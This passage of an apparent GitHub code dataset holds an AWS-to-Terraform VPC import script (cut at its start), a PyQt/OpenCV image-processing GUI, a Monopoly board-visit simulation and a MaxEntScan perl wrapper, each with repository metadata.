argparse\nimport sys\n\npref=\"Vpcs\"\nttft=\"aws_vpc\"\nidfilt=\"VpcId\"\n\n\nif sys.version_info<(3,6,0):\n sys.stderr.write(\"You need python 3.6 or later to run this script\\n\")\n exit(1)\n\n\nnargs=len(sys.argv)\n#print('Argument List:', str(sys.argv))\n#print('Argument 1:', sys.argv[0])\nif nargs==1:\n cmd=\"$AWS ec2 describe-vpcs\"\nelif nargs==2:\n id=str(sys.argv[1])\n cmd=\"$AWS ec2 
describe-vpcs --vpc-ids \"+ id\nelse:\n print(\"error: too many args\")\n exit()\nprint(cmd)\n\n\n\n#out = subprocess.run('aws configure get region', shell=True, capture_output=True)\n#region=out.stdout.decode().rstrip()\n#print(region)\n\nout = subprocess.run(cmd, shell=True, capture_output=True)\nol=len(out.stdout.decode().rstrip())\nif ol==0:\n print(\"No return from command exit ...\")\n exit()\nprint(\"ol=\"+str(ol))\nprint(out.stdout.decode().rstrip())\n\n\njs=json.loads(out.stdout.decode().rstrip())\nprint(json.dumps(js, indent=4, separators=(',', ': ')))\nawsout=js[pref]\n\nprint(json.dumps(awsout, indent=4, separators=(',', ': ')))\ncount=len(awsout)\nprint(count)\nif count > 0:\n for i in range(0,count):\n cname=awsout[i][idfilt]\n print(cname)\n rname=cname.replace(\":\",\"_\")\n rname=rname.replace(\".\",\"_\")\n rname=rname.replace(\"\\\\\",\"_\")\n #print(rname)\n fn=ttft+\"__\"+rname+\".tf\"\n #print(fn)\n if os.path.isfile(fn):\n print(fn+\" exists continuing..\")\n continue\n print(ttft+\" \"+cname+\" import\")\n\n \n cmd ='terraform import '+ttft+'.'+rname+' \"' + cname+ '\" > /dev/null'\n print(cmd)\n out = subprocess.run(cmd, shell=True, capture_output=True)\n ol=len(out.stdout.decode().rstrip())\n if ol==0:\n print(\"No return from command exit ...\")\n exit()\n print(\"ol=\"+str(ol))\n print(out.stdout.decode().rstrip())\n\n cmd ='terraform state show '+ttft+'.'+rname+' > '+ttft+'-'+rname+'-2.txt'\n print(cmd)\n out = subprocess.run(cmd, shell=True, capture_output=True)\n ol=len(out.stdout.decode().rstrip())\n if ol==0:\n print(\"No return from command exit ...\")\n exit()\n print(\"ol=\"+str(ol))\n print(out.stdout.decode().rstrip())\n\n cmd =\"cat \"+ttft+\"-\"+rname+\"-2.txt | perl -pe 's/\\x1b.*?[mGKH]//g' > \"+ttft+\"-\"+rname+\"-1.txt\"\n print(cmd)\n out = subprocess.run(cmd, shell=True, capture_output=True)\n ol=len(out.stdout.decode().rstrip())\n if ol==0:\n print(\"No return from command exit ...\")\n exit()\n print(\"ol=\"+str(ol))\n print(out.stdout.decode().rstrip())\n\n file=ttft+'-'+rname+'-1.txt'\n print(file)\n \n\nexit()\n\"\"\"\n \n echo $aws2tfmess > $fn\n while IFS= read line\n do\n\t\t\t\tskip=0\n # display $line or do something with $line\n t1=`echo \"$line\"`\n if [[ ${t1} == *\"=\"* ]];then\n tt1=`echo \"$line\" | cut -f1 -d'=' | tr -d ' '` \n tt2=`echo \"$line\" | cut -f2- -d'='`\n if [[ ${tt1} == \"arn\" ]];then skip=1; fi \n if [[ ${tt1} == \"id\" ]];then skip=1; fi \n if [[ ${tt1} == \"role_arn\" ]];then skip=1;fi\n if [[ ${tt1} == \"allocated_capacity\" ]];then skip=1;fi\n if [[ ${tt1} == \"dhcp_options_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"main_route_table_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"default_security_group_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"default_route_table_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"owner_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"default_network_acl_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"ipv6_association_id\" ]];then skip=1;fi\n if [[ ${tt1} == \"ipv6_cidr_block\" ]];then skip=1;fi\n fi\n if [ \"$skip\" == \"0\" ]; then\n #echo $skip $t1\n echo \"$t1\" >> $fn\n fi\n \n done <\"$file\"\n \n\n dfn=`printf \"data/data_%s__%s.tf\" $ttft $cname`\n printf \"data \\\"%s\\\" \\\"%s\\\" {\\n\" $ttft $cname > $dfn\n printf \"id = \\\"%s\\\"\\n\" $cname >> $dfn\n printf \"}\\n\" $ttft $cname >> $dfn\n \n done\n fi\ndone\n\nrm -f 
*.backup\n\"\"\"","repo_name":"gilyas/aws-to-terraform-scripts","sub_path":"scripts/100-get-vpc.py","file_name":"100-get-vpc.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13015477477","text":"\nimport sys\nimport cv2\nimport math\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QImage ,QPixmap\nfrom PyQt5.QtWidgets import QMainWindow, QFileDialog\nfrom PyQt5.uic import loadUi\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\nclass ShowImage(QMainWindow):\n\n\n    def __init__(self):\n        super(ShowImage, self).__init__()\n        loadUi('untitled.ui',self)\n        self.image = None\n        self.pushButton.clicked.connect(self.loadClicked)\n        self.grayButton.clicked.connect(self.grayClicked)\n        self.actionBrightness.triggered.connect(self.actionbrightness)\n        self.actionSimple_Contrast.triggered.connect(self.actionContrast)\n        self.actionContrast_Stretching.triggered.connect(self.actionContrast2)\n        self.actionNegative_Image.triggered.connect(self.actionNegativeI)\n        self.actionBiner_Image.triggered.connect(self.actionBinerI)\n        self.actionHistogram_Grayscale.triggered.connect(self.actionGrayH)\n        self.actionRGB_Histogram.triggered.connect(self.actionRGBH)\n        self.actionHistogram_Equalization.triggered.connect(self.actionEqualH)\n        self.actionTranslasi.triggered.connect(self.actiontranslasi)\n        self.action_45_Derajat.triggered.connect(self.actionmin45)\n        self.action45_Derajat.triggered.connect(self.action45)\n        self.action_90_Derajat.triggered.connect(self.actionmin90)\n        self.action90_Derajat.triggered.connect(self.action90)\n        self.action180_Derajat.triggered.connect(self.action180)\n        self.actionZoom_in.triggered.connect(self.actionZoomin)\n        self.actionZoom_out.triggered.connect(self.actionZoomout)\n        self.actionSkewed_Image.triggered.connect(self.actionSkewedImage)\n        self.actionCrop.triggered.connect(self.cropClicked)\n        self.actionKonvolusi.triggered.connect(self.filteringClicked)\n        self.actionMeanFilter.triggered.connect(self.meanfilter)\n        self.actionGaussian_Filter.triggered.connect(self.gaussian)\n        self.actionSharping.triggered.connect(self.sharpening)\n        self.actionMedian_Filtering.triggered.connect(self.median)\n        self.actionMax_Filtering.triggered.connect(self.maxfilter)\n\n    @pyqtSlot()\n    def filteringClicked(self):\n        img = cv2.imread('jantung.jpg')\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n        # x, y = gray.shape[:2]\n        # kernel = np.ones((5, 5), np.float32)/25\n        # h = 5 / 2\n        # w = 5 / 2\n        img_out = cv2.blur(gray, (5, 5))\n        # img_out = cv2.filter2D(gray, -1, kernel)\n        # for i in np.arange(h):\n        #     for j in np.arange(w):\n        #         sum = 0\n        #         for k in -h to h:\n        #             for l in -w to w:\n        #                 a = gray[i+k, j+1]\n        #                 w = img_out(h = k, w = 1)\n        #                 sum = sum + (w*a)\n        #         out[i,j] = sum\n        plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n        plt.xticks([]), plt.yticks([])\n        plt.show()\n\n    def meanfilter(self):\n        img = cv2.imread('jantung.jpg')\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n        kernel = np.array([[1 / 4, 1 / 4], [1 / 4, 1 / 4]])\n        img_out = cv2.filter2D(gray, -1, kernel)\n        plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n        plt.xticks([]), plt.yticks([])\n        plt.show()\n\n    def gaussian(self):\n        img = cv2.imread('jantung.jpg')\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n        # kernel =\n        img_out = cv2.GaussianBlur(gray, (5, 5), 0)\n        plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n        plt.xticks([]), plt.yticks([])\n        plt.show()\n\n    def 
sharpening(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n kernel = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])\n img_out = cv2.filter2D(gray, -1, kernel)\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([]), plt.yticks([])\n plt.show()\n\n def median(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # kernel =\n img_out = cv2.medianBlur(gray, 5)\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([]), plt.yticks([])\n plt.show()\n cv2.dilate(gray, cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5)))\n\n def maxfilter(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # kernel =\n img_out = cv2.dilate(gray, cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5)))\n plt.imshow(img_out, cmap='gray', interpolation='bicubic')\n plt.xticks([]), plt.yticks([])\n plt.show()\n\n def actionbrightness(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n brightness = self.horizontalSlider.value()\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n b = a + brightness\n if b > 255:\n b = 255\n elif b < 0:\n b = 0\n else:\n b = b\n gray.itemset((i, j), b)\n self.image = gray\n self.displayImage(2)\n\n def actionContrast(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n contrast = self.horizontalSlider_2.value ()\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n b = np.math.ceil(a * contrast)\n if b > 255:\n b = 255\n elif b < 0:\n b = 0\n else:\n b = b\n gray.itemset((i, j), b)\n self.image = gray\n self.displayImage(2)\n\n def actionContrast2(self):\n img = cv2.imread('jantung.jpg')\n H, W = img.shape[:2]\n gray = np.zeros((H, W), np.uint8)\n for i in range(H):\n for j in range(W):\n gray[i, j] = np.clip(0.299 * img[i, j, 0] + 0.587 * img[i, j, 1] + 0.114 * img[i, j, 2], 0, 255)\n a = gray[i, j]\n if a > 255:\n a = 255\n elif a < 0:\n a = 0\n else:\n a = a\n b = np.math.ceil(((a - 255) / (255 - 0)) * 255)\n gray.itemset((i, j), b)\n self.image = gray\n self.displayImage(2)\n\n def actionNegativeI(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n max_intensity = 255\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n b = max_intensity - a\n if b > 255:\n b = 255\n elif b < 0:\n b = 0\n else:\n b = b\n gray.itemset((i, j), b)\n self.image = gray\n self.displayImage(2)\n\n def actionBinerI(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n a1 = 150\n a2 = 50\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n if a < a1:\n a = a1\n elif a >= a2:\n a = a2\n else:\n a = a\n gray.itemset((i, j), a)\n self.image = gray\n self.displayImage(2)\n\n def actionGrayH(self):\n img = cv2.imread('jantung.jpg')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n h, w = gray.shape[:2]\n for i in np.arange(h):\n for j in np.arange(w):\n a = gray.item(i, j)\n gray.itemset((i, j), a)\n self.image = gray\n self.displayImage(2)\n plt.hist(gray.ravel(), 255, [0, 255])\n plt.show()\n\n def actionRGBH(self):\n img = cv2.imread('jantung.jpg')\n color = ('b', 'g', 'r')\n for i, col in enumerate(color):\n histo = cv2.calcHist([img], [i], None, [256], [0, 256])\n plt.plot(histo, color = col)\n plt.xlim([0, 256])\n plt.show()\n\n def 
actionEqualH(self):\n img = cv2.imread('jantung.jpg')\n hist, bins = np.histogram(img.flatten(), 256, [0, 256])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max() / cdf.max()\n cdf_m = np.ma.masked_equal(cdf, 0)\n cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())\n cdf = np.ma.filled(cdf_m, 0).astype('uint8')\n self.image = cdf[img]\n self.displayImage(2)\n\n plt.plot(cdf_normalized, color = 'b')\n plt.hist(img.flatten(), 256, [0, 256], color = 'r')\n plt.xlim([0, 256])\n plt.legend(('cdf', 'histogram'), loc = 'upper left')\n plt.show()\n\n def actiontranslasi(self):\n img = cv2.imread('jantung.jpg')\n h,w = img.shape[:2]\n quarter_h, quarter_w = h/4, w/4\n T = np.float32([[1, 0, quarter_w], [0, 1, quarter_h]])\n gray = cv2.warpAffine(img, T, (w, h))\n self.image = gray\n self.displayImage(2)\n\n def actionmin45(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w/2, h/2), -45, .7)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h*sin) + (w*cos))\n nH = int((h*cos) + (w*sin))\n\n rotationMatrix[0, 2] += (nW/2) - w/2\n rotationMatrix[1, 2] += (nH/2) - h/2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image=rot_image\n self.displayImage(1)\n\n def action45(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w / 2, h / 2), 45, .7)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n rotationMatrix[0, 2] += (nW / 2) - w / 2\n rotationMatrix[1, 2] += (nH / 2) - h / 2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image = rot_image\n self.displayImage(1)\n\n def actionmin90(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w / 2, h / 2), -90, 1)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n rotationMatrix[0, 2] += (nW / 2) - w / 2\n rotationMatrix[1, 2] += (nH / 2) - h / 2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image = rot_image\n self.displayImage(1)\n\n def action90(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w / 2, h / 2), 90, 1)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n rotationMatrix[0, 2] += (nW / 2) - w / 2\n rotationMatrix[1, 2] += (nH / 2) - h / 2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image = rot_image\n self.displayImage(1)\n\n def action180(self):\n img = cv2.imread('jantung.jpg')\n h, w = self.image.shape[:2]\n\n rotationMatrix = cv2.getRotationMatrix2D((w / 2, h / 2), 180, 1)\n cos = np.abs(rotationMatrix[0, 0])\n sin = np.abs(rotationMatrix[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n rotationMatrix[0, 2] += (nW / 2) - w / 2\n rotationMatrix[1, 2] += (nH / 2) - h / 2\n\n rot_image = cv2.warpAffine(img, rotationMatrix, (h, w))\n self.image = rot_image\n self.displayImage(1)\n\n def actionZoomin(self):\n img = cv2.imread('jantung.jpg')\n resize_img=cv2.resize(img,None,fx=2,fy=2,interpolation=cv2.INTER_CUBIC)\n cv2.imshow('Zoom in', resize_img)\n\n def actionZoomout(self):\n img = cv2.imread('jantung.jpg')\n resize_img = 
cv2.resize(img,None,fx=0.50,fy=0.50)\n cv2.imshow('Zoom out', resize_img)\n\n def actionSkewedImage(self):\n img = cv2.imread('jantung.jpg')\n resize_img=cv2.resize(img,(900,400),interpolation=cv2.INTER_AREA)\n cv2.imshow('Skewed Image',resize_img)\n\n def cropClicked(self):\n #img = cv2.imread('jantung.jpg.jpg')\n x1 = 30\n y1 = 30\n x2 = 250\n y2 = 250\n img = self.image[x1:x2, y1:y2]\n cv2.imshow('Crop', img)\n\n def saveClicked(self):\n flname, filter = QFileDialog.getSaveFileName(self, 'Save File', 'D:\\\\', \"Image Files (*.jpg)\")\n if flname:\n cv2.imwrite(flname, self.image)\n else:\n print('error')\n\n def loadClicked(self):\n self.loadImage('AB.jpg')\n\n def grayClicked(self):\n H, W = self.image.shape[:2]\n gray = np.zeros((H, W), np.uint8)\n for i in range (H):\n for j in range (W):\n gray[i,j]= np.clip(0.299 * self.image[i, j, 0] + 0.587 * self.image[i, j, 1] + 0.114 * self.image[i, j, 2], 0, 255)\n self.image = gray\n self.displayImage(2)\n\n def loadImage(self,flname):\n self.image = cv2.imread(flname, cv2.IMREAD_COLOR)\n self.displayImage()\n\n def displayImage(self, windows=1):\n qformat = QImage.Format_Indexed8\n img = QImage(self.image, self.image.shape[1], self.image.shape[0], self.image.strides[0], qformat)\n img = img.rgbSwapped()\n if windows == 1:\n self.imgLabel.setPixmap(QPixmap.fromImage(img))\n self.imgLabel.setScaledContents(True)\n if windows == 2:\n self.hasilLabel.setPixmap(QPixmap.fromImage(img))\n self.hasilLabel.setScaledContents(True)\n\n if len(self.image.shape) == 3:\n if (self.image.shape[2]) == 4:\n qformat = QImage.Format_RGBA8888\n\n else:\n qformat = QImage.Format_RGB888\n img = QImage(self.image, self.image.shape[1], self.image.shape[0], self.image.strides[0], qformat)\n\n img = img.rgbSwapped()\n\n self.imgLabel.setPixmap(QPixmap.fromImage(img))\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = ShowImage()\nwindow.setWindowTitle('Show Image GUI')\nwindow.show()\nsys.exit(app.exec_())\n","repo_name":"ilham-ilo/Catering-Online","sub_path":"D6/D6/D6.py","file_name":"D6.py","file_ext":"py","file_size_in_byte":14830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14091993811","text":"# Game Actions\nimport pandas as pd\nimport random\nfrom card import *\nfrom player import *\n\ndef loadBoard():\n \"\"\" Loads board in a dataframe \"\"\"\n\n board = pd.read_csv(\"board.csv\")\n board['visits'] = 0\n board['owned'] = False\n return board\n\ndef loadCards():\n \"\"\" Loads Chance & Community Chest card info \"\"\"\n\n chanceDeck = []\n communityDeck = []\n chance = pd.read_csv(\"chance.csv\", engine='python')\n chest = pd.read_csv(\"communityChest.csv\", engine='python')\n\n for i in range(chance.shape[0]):\n card = Card(chance,i)\n chanceDeck.append(card)\n \n for i in range(chest.shape[0]):\n card = Card(chest,i)\n communityDeck.append(card)\n\n return chanceDeck, communityDeck\n\ndef createPlayers(n):\n \"\"\" Create n players for game \"\"\"\n\n players = []\n for i in range(1,n+1):\n pName = 'p' + str(i)\n p = Player(pName)\n players.append(p)\n\n return players\n\ndef visitSimulations(players, board, communityCards, chanceCards, nTurns, nGames):\n \"\"\" Performs simulations on object \"\"\"\n for i in range(1,nGames+1):\n print(f'\\n=== Game #{i} ===')\n for t in range(1, nTurns + 1):\n for p in players:\n print(f'\\n=== {p.name} Turn #: {t} ===')\n rollDice(p,players,board,communityCards,chanceCards)\n \n return\n\ndef jailStrategy(p, board):\n \"\"\" Applies jail rules and 
strategy \"\"\"\n\n payJailThreshold = 200\n d1 = random.randint(1,6)\n d2 = random.randint(1,6)\n totalRoll = d1 + d2\n doubles = (d1 == d2)\n previousLocation = p.location\n jailFee = 50\n\n\n print(f'Jail Rolls: {p.jailRolls}')\n\n # Use Get out of Jail Free card\n if(p.jailFreeCard):\n print(\"Used \\\"Get Out of Jail Free\\\" card.\")\n p.jail = False\n p.jailRolls = 0\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return p\n # On 3rd Jail Roll\n elif(p.jailRolls == 3):\n print(\"Final Free Jail Roll.\")\n if(doubles):\n p.jail = False\n p.jailRolls = 0\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n p.numDoubles += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return p\n else:\n print(\"No Doubles on 3rd Jail Row. Pay $50 fee.\")\n if(p.canPay(jailFee)):\n p.money -= 50\n p.jail = False\n p.jailRolls = 0\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return p\n # else:\n # print(f\"Game Over for {p.name}.\")\n # p.inGame = False\n # return p\n elif(p.money <= payJailThreshold):\n if(doubles):\n print(\"JAIL - Rolled doubles! Free from Jail!\")\n p.jail = False\n p.jailRolls = 0\n p.numDoubles += 1\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n else:\n print(\"JAIL - No doubles. Turn over.\")\n board.loc[p.location,\"visits\"] += 1\n return p\n else:\n print(f\"{p.name} paid Jail Fee of $50.\")\n p.money -= jailFee\n print(p.money)\n p.jail = False\n p.jailRolls = 0\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return p\n\ndef rollDice(p, playerList, board, communityCards, chanceCards):\n \"\"\" \n Method to simulate 3 rolling outcomes. \n 1. Two different dice = Perform action & turn over\n 2. Same dice & total # of rolls < 3 = Perform action & roll Again\n 3. Same dice & total # of rolls is 3 = Go to Jail\n \"\"\"\n\n rollCount = 1\n doubles = True\n jail = 10\n\n # Apply Jail Rules\n if(p.jail):\n p.jailRolls += 1\n p = jailStrategy(p, board)\n return\n \n while(doubles):\n # 3 straight doubles --> Go to Jail!\n if(rollCount == 3):\n print(\"Roll 3 straight doubles. 
Go directly to jail!\")\n p.numDoubles += 1\n p.location = jail\n p.jail = True\n board.loc[p.location,\"visits\"] += 1\n return\n\n d1 = random.randint(1,6)\n d2 = random.randint(1,6)\n \n totalRoll = d1 + d2\n previousLocation = p.location\n newLocation = previousLocation + totalRoll\n \n # If pass Go!, collect 200\n if (newLocation >= 40):\n p.money += 200\n p.location = newLocation % 40\n board.loc[p.location,\"visits\"] += 1\n # Only Possible Community Chest Space near Go\n if(p.location == 2):\n print('Community Chest Loc-2')\n p = communityChest(p, playerList, board, communityCards)\n print(f'After CC p.location = {p.location}')\n # if(p.location-2 != 0):\n # board.loc[p.location,\"visits\"] += 1\n # Only Possible Chance Space near Go\n elif(p.location == 7):\n print('Chance Loc-7')\n p = chance(p, playerList, board, chanceCards)\n print(f'new p.location = {p.location}')\n # if(p.location-7 != 0):\n # board.loc[p.location,\"visits\"] += 1\n else:\n # All non-Chance & non-Community Chest Spaces\n p.location = previousLocation + totalRoll\n board.loc[p.location,\"visits\"] += 1\n if(p.location == 30):\n p.location = jail\n p.jail = True\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return\n # Community Chest Spaces\n elif(p.location == 2 or p.location == 17 or p.location == 33):\n print(f'Community Chest Loc-{p.location}')\n p=communityChest(p, playerList, board, communityCards)\n print(f'After CC p.location = {p.location}')\n # if(p.location-2 != 0 or p.location-17 != 0 or p.location-33 != 0):\n # board.loc[p.location,\"visits\"] += 1\n # Chance Spaces\n elif(p.location == 7 or p.location == 22 or p.location == 36):\n print(f'Chance Loc-{p.location}')\n p=chance(p, playerList, board, chanceCards)\n print(f'After Chance p.location = {p.location}')\n # if(p.location- 7 != 0 or p.location-22 != 0 or p.location-36 != 0):\n # board.loc[p.location,\"visits\"] += 1\n\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n\n # Rolled Doubles\n if(d1 == d2):\n print(\"You rolled doubles! 
Go again!\\n\")\n doubles = True\n p.numDoubles += 1\n rollCount += 1\n continue\n else:\n # End of Turn\n print(\"Turn Over.\")\n doubles = False\n return\n\ndef communityChest(p, playerList, board, cards):\n \"\"\" Simulates pulling a Community Chest card in game \"\"\"\n\n otherPlayers = [player for player in playerList if player.name != p.name]\n \n card = cards.pop(0)\n print(card.text)\n\n if(card.category == 'money'):\n p.money += int(card.action)\n\n elif(card.category == 'moneyPlayers'):\n # Receive $10/$50 from other players\n total = 0\n for player in otherPlayers:\n player.money -= int(card.action)\n total += int(card.action)\n p.money += total\n \n elif(card.category == 'move'):\n # Go To Jail card\n if(card.id == 5):\n p.jail = True\n p.location = int(card.action)\n # Move to Go\n else:\n p.location = int(card.action)\n\n # elif(card.category == 'moneyHouses'):\n # # Pay tax for houses and hotels card\n \n elif(card.category == 'keep'):\n # Get Out of Jail Free card\n p.jailFreeCard = True\n\n cards.append(card)\n\n return p\n \ndef chance(p, playerList, board, cards):\n \"\"\" Simulates pulling a Chance card in game \"\"\"\n\n otherPlayers = [player for player in playerList if player.name != p.name]\n \n card = cards.pop(0)\n cid = card.id\n print(card.text)\n\n if(card.category == 'move'):\n # Move back 3 spaces\n if(cid == 8):\n p.location = p.location-3\n # Go to Jail\n elif(cid == 9):\n p.location = int(card.action)\n p.jail = True\n # Advanced to Boardwalk.\n elif(cid == 13):\n p.location = int(card.action)\n \n elif(card.category == 'money'):\n p.money += int(card.action)\n\n elif(card.category == 'moveGo'):\n # Advance to Go and Collect $200\n if(cid == 0):\n p.money += 200\n p.location = int(card.action) \n # Advance to Illinois Avenue\n elif(cid == 1):\n if(p.location >= 24 and p.location <= 39):\n p.money += 200\n p.location = int(card.action)\n else:\n p.location = int(card.action)\n # Advanced to St. Charles Place. Collect $200 if you pass go\n elif(cid == 2):\n if(p.location >= 11 and p.location <= 39):\n p.money += 200\n p.location = int(card.action)\n else:\n p.location = int(card.action)\n # Advance to Reading Railroad. 
Collect $200 if you pass go\n elif(cid == 12):\n if(p.location <= 5):\n p.location = int(card.action)\n else:\n p.money += 200\n p.location = int(card.action)\n\n elif(card.category == 'moveRailroad'):\n # Move to nearest RR\n # Pennsylvania RR\n if(p.location == 7):\n p.location = 15\n # B&O RR\n elif(p.location == 22):\n p.location = 25\n # Reading RR\n elif(p.location == 36):\n p.location = 5\n\n elif(card.category == 'moveUtility'):\n # Move to nearest Utility\n # Electric Company\n if(p.location == 7 or p.location == 36):\n p.location = 12\n # Water Works\n else:\n p.location = 28\n\n # elif(card.category == 'moneyHouses'):\n # # Pay $25 per house, $115 per hotel\n \n elif(card.category == 'keep'):\n # Get out of Jail Free card\n p.jailFreeCard = True\n\n elif(card.category == 'moneyPlayers'):\n # Pay each player $50\n totalPay = 0\n for player in otherPlayers:\n player.money += 50\n totalPay += 50\n p.money -= totalPay\n\n cards.append(card)\n\n return p\n\n# def propertyAction(location, board):\n# \"\"\" Executes action of property \"\"\"\n\n# pass\n","repo_name":"tlan2/monopoly_simulation","sub_path":"code/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":13106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73932739024","text":"\"\"\"\nThis is meant to serve as a wrapper for MaxEntScan.\n\nThe perl scripts and data files were downloaded from:\nhttp://genes.mit.edu/burgelab/maxent/download/.\n\nCommand semantics are:\n perl score5.pl fn5\n perl score3.pl fn3\n\n Here fn5 is \\n separated\n 9mers with 3 bases in the intron.\n fn3 is 23mers with 3 bases in the intron.\n\nThe main possible improvement to this tool\nwould be to provide an updated data set,\nbut I'm sure there is some subtlety in\ngetting this right.\n\"\"\"\nfrom subprocess import Popen, PIPE, STDOUT\nimport numpy as np\n\ndef maxentscan(seqs, five, BATCH = 10000):\n script = 'MaxEntScan/'\n script += 'score5.pl' if five else 'score3.pl'\n \n scores = []\n begin, end = 0, BATCH\n while end - BATCH < len(seqs):\n p = Popen(['perl', script, '-'], stdout=PIPE, stdin=PIPE)\n scores += [np.array(map(lambda x: float(x.split('\\t')[1]),\n p.communicate(input = '\\n'.join(seqs[begin:end]))[0].split('\\n')[:-1]))]\n begin = end\n end = end + BATCH\n return 